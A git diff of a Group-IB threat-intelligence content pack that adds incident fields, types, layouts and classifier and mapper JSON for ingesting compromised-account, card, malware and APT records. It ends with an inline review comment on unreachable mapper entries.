Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Regions.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Sectors.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Aliases.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_CVE.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Country.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Description.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Goals.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Labels.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Reports_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Roles.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Countries.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Description.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Expertises.json create mode 100644 
Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Langs.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Regions.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Report_Number.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Sectors.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Title.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_OSI_Git_Repository_Files_Table.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BIC.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BSB.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_CLABE.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_IBAN.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_Name.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_SWIFT.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_Domain.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_IP.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Passwords.json
 create mode 100644
Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Brand.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Added.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Detected.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Updated.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Expiration_Date.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Puny.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_IP_Table.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Email.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Path.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Source.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Table.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Objectives.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Registrar.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Sources.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_URLs.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Provider_Domain.json
 create mode 100644
Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Port.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Source.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Sources.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Type.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Report_Number.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reporter.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Categories.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Sources.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_Domain.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_IP.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_URL.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Socks_Proxy_Source.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_ASN.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_City.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain_Provider.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_IP.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Provider.json
 create mode 100644
Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Region.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Country.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actors_Table.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Level.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Update_Time.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Upload_Time.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Names.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Sources.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Vulnerability_Type.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_APT_Threat.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_DDOS.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Deface.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Group.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Kit.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account_Group.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card_Group.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Mule.json
 create mode 100644
Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat_Actor.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware_CNC.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat_Actor.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Vulnerability.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Open_Proxy.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Scanner.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Socks_Proxy.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_TOR_Node.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_VPN.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Hash.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/avalible_collections_example.json
 delete mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/example.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/main_collections_examples.json
 delete mode 100644
Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/results.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/search_example.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/avalible_collections_example.json
 delete mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/example.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/main_collections_examples.json
 delete mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/results.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_APT_Threat_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_DDOS_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Deface_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Group_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Kit_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Group_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Group_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Actor_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_CNC_Layout.json
 create mode 100644
Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Actor_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Vulnerability_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Open_Proxy_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Scanner_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Socks_Proxy_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_TOR_Node_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_VPN_Layout.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/PreProcessRules/preprocessrule-4d9ca067-e506-4bcb-8ee5-fe5fb30e72d8-gib_rule.json
 create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
index 795980bb46ba..09370649b2ec 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
@@ -17,38 +17,4 @@
 ignore=IM111
 ignore=BA101
 [file:1_4_1.md]
-ignore=RN116
-
-# GR103 is temporary, see CIAC-11656
-[file:incidentfield-GIB_Screenshot.json]
-ignore=GR103
-[file:incidentfield-GIB_Related_Indicators_Data.json]
-ignore=GR103
-[file:incidentfield-GIB_Date_Expired.json]
-ignore=GR103
-[file:incidentfield-GIB_Phishing_Status.json]
-ignore=GR103
-[file:incidentfield-GIB_HTML.json]
-ignore=GR103
-[file:incidentfield-GIB_Date_Created.json]
-ignore=GR103
-[file:incidentfield-GIB_Address.json]
-ignore=GR103
-[file:incidentfield-GIB_Phishing_Domain.json]
-ignore=GR103
-[file:incidentfield-GIB_Phishing_Type.json]
-ignore=GR103
-[file:incidentfield-GIB_Title.json]
-ignore=GR103
-[file:classifier-Group-IB_Threat_Intelligence_mapper.json]
-ignore=GR103
-[file:incidentfield-GIB_Name_Servers.json]
-ignore=GR103
-[file:incidentfield-GIB_Email.json]
-ignore=GR103
-[file:incidentfield-GIB_Person.json]
-ignore=GR103
-[file:incidentfield-GIB_ID.json]
-ignore=GR103
-[file:incidentfield-GIB_Favicon.json]
-ignore=GR103
+ignore=RN116
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.secrets-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.secrets-ignore
index 4fabadf8858b..a00f6eefc97e 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/.secrets-ignore
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.secrets-ignore
@@ -1,5 +1,6 @@
 11.11.11.11
 https://some.ru
+https://some-url.com
 some.ru
 109.70.100.46
 some@gmail.ru
@@ -14,4 +15,6 @@ password name TA Name provider
-region
\ No newline at end of file
+region
+gibextendedcvsstemporal
+softwareMixed.softwareType
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_classifier.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_classifier.json
index 781ceca06255..9fb6da364af8 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_classifier.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_classifier.json
@@ -3,14 +3,28 @@
 "feed": false,
 "id": "Group-IB Threat Intelligence (classifier)",
 "keyTypeMap": {
- "bp/phishing": "GIB Brand Protection Phishing",
- "bp/phishing_kit": "GIB Brand Protection Phishing Kit",
- "compromised/account": "GIB Compromised Account",
 "compromised/breached": "GIB Data Breach",
- "compromised/card": "GIB Compromised Card",
- "malware/targeted_malware": "GIB Targeted Malware",
 "osi/git_repository": "GIB OSI Git Leak",
- "osi/public_leak": "GIB OSI Public Leak"
+ "osi/public_leak": "GIB OSI Public Leak",
+ "compromised/account_group": "GIB Compromised Account Group",
+ "compromised/bank_card_group": "GIB Compromised Card Group",
+ "compromised/mule": "GIB Compromised Mule",
+ "suspicious_ip/vpn": "GIB Suspicious IP VPN",
+ "suspicious_ip/scanner": "GIB Suspicious IP Scanner",
+ "suspicious_ip/tor_node": "GIB Suspicious IP TOR Node",
+ "suspicious_ip/open_proxy": "GIB Suspicious IP Open Proxy",
+ "suspicious_ip/socks_proxy": "GIB Suspicious IP Socks Proxy",
+ "malware/malware": "GIB Malware",
+ "malware/cnc": "GIB Malware CNC",
+ "attacks/ddos": "GIB Attacks DDOS",
+ "attacks/deface": "GIB Attacks Deface",
+ "attacks/phishing_kit": "GIB Attacks Phishing Kit",
+ "attacks/phishing_group": "GIB Attacks Phishing Group",
+ "hi/threat": "GIB Cybercriminal Threat",
+ "hi/threat_actor": "GIB Cybercriminal Threat Actor",
+ "apt/threat_actor": "GIB Nation-State Cybercriminals Threat Actor",
+ "apt/threat": "GIB Nation-State Cybercriminals Threat",
+ "osi/vulnerability": "GIB OSI Vulnerability"
 },
 "name": "Group-IB Threat Intelligence (classifier)",
 "transformer": {
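Review bot: The rewritten keyTypeMap no longer routes any collection key to `GIB Compromised Account` or `GIB Compromised Card` (the `compromised/account` and `compromised/card` entries are removed and the replacements point at the new `… Group` types), yet the mapper diff in this same patch still defines mapping blocks under those two incident-type names (its first hunk and the `@@ -356,216` hunk). If those types are kept only so existing incidents retain their layout, a sentence in the release notes saying so would help; otherwise the two mapper blocks are unreachable through this classifier and can go. As a point of style, the map was previously kept in alphabetical key order and the new entries are appended unsorted (`apt/*` after `hi/*`, `osi/vulnerability` last); sorting them keeps future diffs reviewable.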
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_mapper.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_mapper.json
index dd6f40f59968..739e5738f257 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_mapper.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_mapper.json
@@ -3,334 +3,167 @@ "feed": false, "id": "Group-IB Threat Intelligence (mapper)", "mapping": { - "GIB Brand Protection Domain": { + "GIB Compromised Account": { "dontMapEventToLabels": true, "internalMapping": { "GIB Address": { "complex": { "accessor": "address", "filters": [], - "root": "attrs", - "transformers": [] - }, - "simple": "" - }, - "GIB Date Created": { - "complex": { - "accessor": "date_registered", - "filters": [], - "root": "attrs", - "transformers": [ - { - "args": { - "add_utc_timezone": { - "isContext": false, - "value": null - }, - "dayfirst": { - "isContext": false, - "value": { - "complex": null, - "simple": "\"False\"" - } - }, - "fuzzy": { - "isContext": false, - "value": null - }, - "yearfirst": { - "isContext": false, - "value": { - "complex": null, - "simple": "\"True\"" - } - } - }, - "operator": "DateStringToISOFormat" - } - ] - }, - "simple": "" - }, - "GIB Date Expired": { - "complex": { - "accessor": "date_expired", - "filters": [], - "root": "attrs", - "transformers": [ - { - "args": { - "add_utc_timezone": { - "isContext": false, - "value": null - }, - "dayfirst": { - "isContext": false, - "value": { - "complex": null, - "simple": "\"False\"" - } - }, - "fuzzy": { - "isContext": false, - "value": null - }, - "yearfirst": { - "isContext": false, - "value": { - "complex": null, - "simple": "\"True\"" - } - } - }, - "operator": "DateStringToISOFormat" - } - ] - }, - "simple": "" - }, - "GIB Email": { - "complex": { - "accessor": "email", - "filters": [], - "root": "attrs", + "root": "person", "transformers": [] - }, - "simple": "" + } }, - "GIB Favicon": { + "GIB Compromised Login": { "complex": { - "accessor": "favicon", "filters": [], - "root": "attrs", + "root": "login", "transformers": [] - }, - "simple": "" + } }, - "GIB HTML": { + "GIB Date Compromised": { "complex": { - "accessor": "html", "filters": [], - "root": "attrs", + "root": "dateCompromised", "transformers": [] - }, - "simple": "" + } }, - "GIB ID": { + "GIB Date of 
Detection": { "complex": { - "accessor": "", "filters": [], - "root": "id", + "root": "dateDetected", "transformers": [] - }, - "simple": "" - }, - "GIB Name Servers": { - "complex": { - "accessor": "name_server", - "filters": [], - "root": "attrs", - "transformers": [ - { - "args": { - "separator": { - "isContext": false, - "value": { - "complex": null, - "simple": ", " - } - } - }, - "operator": "join" - } - ] - }, - "simple": "" + } }, - "GIB Person": { + "GIB Drop Email": { "complex": { - "accessor": "person", + "accessor": "email", "filters": [], - "root": "attrs", + "root": "dropEmail", "transformers": [] - }, - "simple": "" + } }, - "GIB Phishing Domain": { + "GIB Drop Email Domain": { "complex": { "accessor": "domain", "filters": [], - "root": "attrs", - "transformers": [] - }, - "simple": "" - }, - "GIB Phishing Status": { - "complex": { - "accessor": "status", - "filters": [], - "root": "attrs", - "transformers": [] - }, - "simple": "" - }, - "GIB Phishing Type": { - "complex": { - "accessor": "type", - "filters": [], - "root": "attrs", + "root": "dropEmail", "transformers": [] - }, - "simple": "" + } }, - "GIB Related Indicators Data": { + "GIB Email": { "complex": { - "accessor": "", + "accessor": "email", "filters": [], - "root": "relatedIndicatorsData", + "root": "person", "transformers": [] - }, - "simple": "" + } }, - "GIB Screenshot": { + "GIB ID": { "complex": { - "accessor": "screenshot", "filters": [], - "root": "attrs", + "root": "id", "transformers": [] - }, - "simple": "" + } }, - "GIB Title": { + "GIB Malware Name": { "complex": { - "accessor": "page_title", + "accessor": "name", "filters": [], - "root": "attrs", + "root": "malware", "transformers": [] - }, - "simple": "" + } }, - "Phone Number": { - "complex": { - "accessor": "phone", - "filters": [], - "root": "attrs", - "transformers": [] - }, - "simple": "" - } - } - }, - "GIB Brand Protection Phishing": { - "dontMapEventToLabels": true, - "internalMapping": { - "GIB Date of Detection": 
{ + "GIB Password": { "complex": { - "accessor": "", "filters": [], - "root": "dateDetected", + "root": "password", "transformers": [] - }, - "simple": "" + } }, - "GIB ID": { + "GIB Person": { "complex": { - "accessor": "", + "accessor": "name", "filters": [], - "root": "id", + "root": "person", "transformers": [] - }, - "simple": "" + } }, - "GIB Phishing Date Blocked": { + "GIB Portal Link": { "complex": { - "accessor": "", "filters": [], - "root": "dateBlocked", + "root": "portalLink", "transformers": [] - }, - "simple": "" + } }, - "GIB Phishing Status": { + "GIB Related Indicators Data": { "complex": { - "accessor": "", "filters": [], - "root": "status", + "root": "relatedIndicatorsData", "transformers": [] - }, - "simple": "" + } }, - "GIB Portal Link": { + "GIB Severity": { "complex": { - "accessor": "", + "accessor": "severity", "filters": [], - "root": "portalLink", + "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, - "GIB Related Indicators Data": { + "GIB Source": { "complex": { - "accessor": "", "filters": [], - "root": "relatedIndicatorsData", + "root": "sourceType", "transformers": [] - }, - "simple": "" + } }, - "GIB Severity": { + "GIB Threat Actor ID": { "complex": { - "accessor": "severity", + "accessor": "id", "filters": [], - "root": "evaluation", + "root": "threatActor", "transformers": [] - }, - "simple": "" + } }, - "GIB Target Brand": { + "GIB Threat Actor Name": { "complex": { - "accessor": "", + "accessor": "name", "filters": [], - "root": "targetBrand", + "root": "threatActor", "transformers": [] - }, - "simple": "" + } }, - "GIB Target Category": { + "GIB Threat Actor is APT": { "complex": { - "accessor": "", + "accessor": "isAPT", "filters": [], - "root": "targetCategory", + "root": "threatActor", "transformers": [] - }, - "simple": "" + } }, - "GIB Target Domain": { + "GIB Victim IP": { "complex": { - "accessor": "", + "accessor": "ip", "filters": [], - "root": "targetDomain", + "root": "client.ipv4", 
"transformers": [] - }, - "simple": "" + } }, - "GIB Title": { + "Phone Number": { "complex": { - "accessor": "title", + "accessor": "phone", "filters": [], - "root": "phishingDomain", + "root": "person", "transformers": [] - }, - "simple": "" + } }, "severity": { "complex": { - "accessor": "", "filters": [], "root": "systemSeverity", "transformers": [] - }, - "simple": "" + } }, "GIB Admiralty Code": { "complex": { @@ -338,8 +171,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Credibility": { "complex": { @@ -347,8 +179,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Reliability": { "complex": { 
@@ -356,216 +187,89 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } } } }, - "GIB Brand Protection Phishing Kit": { + "GIB Compromised Card": { "dontMapEventToLabels": true, "internalMapping": { - "GIB Date Created": { - "complex": { - "accessor": "", - "filters": [], - "root": "dateFirstSeen", - "transformers": [] - }, - "simple": "" - }, - "GIB Date of Detection": { - "complex": { - "accessor": "", - "filters": [], - "root": "dateDetected", - "transformers": [] - }, - "simple": "" - }, - "GIB Downloaded From": { - "complex": { - "accessor": "", - "filters": [], - "root": "downloadedFrom", - "transformers": [] - }, - "simple": "" - }, - "GIB ID": { - "complex": { - "accessor": "", - "filters": [], - "root": "id", - "transformers": [] - }, - "simple": "" - }, - "GIB Phishing Kit Emails": { - "complex": { - "accessor": "", - "filters": [], - "root": "emails", - "transformers": [] - }, - "simple": "" - }, - "GIB Phishing Kit Hash": { - "complex": { - "accessor": "", - "filters": [], - "root": "hash", - "transformers": [] - }, - "simple": "" - }, - "GIB Portal Link": { - "complex": { - "accessor": "", - "filters": [], - "root": "portalLink", - "transformers": [] - }, - "simple": "" - }, - "GIB Related Indicators Data": { - "complex": { - "accessor": "", - "filters": [], - "root": "relatedIndicatorsData", - "transformers": [] - }, - "simple": "" - }, - "GIB Severity": { - "complex": { - "accessor": "severity", - "filters": [], - "root": "evaluation", - "transformers": [] - }, - "simple": "" - }, - "GIB Target Brand": { + "GIB Address": { "complex": { - "accessor": "", + "accessor": "address", "filters": [], - "root": "targetBrand", + "root": "owner", "transformers": [] - }, - "simple": "" + } }, - "severity": { + "GIB CVV": { "complex": { - "accessor": "", + "accessor": "cvv", "filters": [], - "root": "systemSeverity", + "root": "cardInfo", "transformers": [] - }, - "simple": "" + } }, - "GIB Admiralty Code": { + "GIB Card Issuer": { 
"complex": { - "accessor": "admiraltyCode", + "accessor": "issuer", "filters": [], - "root": "evaluation", + "root": "cardInfo.issuer", "transformers": [] - }, - "simple": "" + } }, - "GIB Credibility": { + "GIB Card Number": { "complex": { - "accessor": "credibility", + "accessor": "number", "filters": [], - "root": "evaluation", + "root": "cardInfo", "transformers": [] - }, - "simple": "" + } }, - "GIB Reliability": { - "complex": { - "accessor": "reliability", - "filters": [], - "root": "evaluation", - "transformers": [] - }, - "simple": "" - } - } - }, - "GIB Compromised Account": { - "dontMapEventToLabels": true, - "internalMapping": { - "GIB Address": { + "GIB Card Type": { "complex": { - "accessor": "address", + "accessor": "type", "filters": [], - "root": "person", + "root": "cardInfo", "transformers": [] - }, - "simple": "" + } }, - "GIB Compromised Login": { + "GIB Card Valid Thru": { "complex": { - "accessor": "", + "accessor": "validThru", "filters": [], - "root": "login", + "root": "cardInfo", "transformers": [] - }, - 